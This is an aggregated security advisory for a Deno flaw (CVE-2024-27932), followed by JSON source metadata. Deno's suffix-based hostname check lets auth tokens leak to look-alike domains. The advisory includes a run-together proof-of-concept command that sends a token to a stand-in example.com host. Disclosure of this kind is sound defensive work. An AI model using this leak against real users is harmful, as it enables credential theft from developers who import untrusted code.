Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com.
authtokens.rs uses a simple endswith check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.
denovulnpoc.example.com.DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.comWhat kind of vulnerability is it? Who is impacted? Anyone who uses DENOAUTHTOKENS and imports potentially untrusted code is affected.
{
"sources": [
{
"html_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27932",
"id": "CVE-2024-27932",
"modified": "2025-01-03T19:19:52.197Z",
"published": "2024-03-21T02:52:21.953Z",
"url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2024-27932",
"imported": "2026-04-14T12:58:55.024Z"
},
{
"html_url": "https://github.com/advisories/GHSA-5frw-4rwq-xhcr",
"id": "GHSA-5frw-4rwq-xhcr",
"modified": "2024-03-21T18:25:43Z",
"published": "2024-03-06T17:03:36Z",
"url": "https://api.github.com/advisories/GHSA-5frw-4rwq-xhcr",
"imported": "2026-04-14T12:58:59.425Z"
},
{
"html_url": "https://euvd.enisa.europa.eu/vulnerability/EUVD-2024-0827",
"id": "EUVD-2024-0827",
"modified": "2024-08-05T16:59:34Z",
"published": "2024-03-06T20:45:16Z",
"url": "https://euvdservices.enisa.europa.eu/api/enisaid?id=EUVD-2024-0827",
"imported": "2026-04-14T12:58:57.176Z"
}
],
"license": "CC-BY-4.0"
}